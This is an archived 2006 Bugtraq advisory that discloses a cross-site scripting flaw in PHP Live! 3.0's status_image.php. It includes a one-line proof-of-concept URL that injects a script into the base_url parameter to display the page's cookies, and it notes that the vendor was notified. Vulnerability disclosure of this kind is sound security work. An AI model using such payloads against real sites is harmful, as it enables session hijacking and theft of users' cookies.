lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 22 Mar 2006 06:07:48 -0500 From: kspecial <kspecial@...iroz.net> To: bugtraq@...urityfocus.com Subject: PHP Live! XSS status_image.php Date: 03/22/2006 Vendor: OSI Codes Product: PHP Live! Versions: tested 3.0 Vulnerability: Cross Site Scripting Location: status_image.php Exploit: /phplive/js/status_image.php?base_url=<script>alert(document.cookie)</script> Stumbled across this while auditing a web server, vendor has been notified. --K-sPecial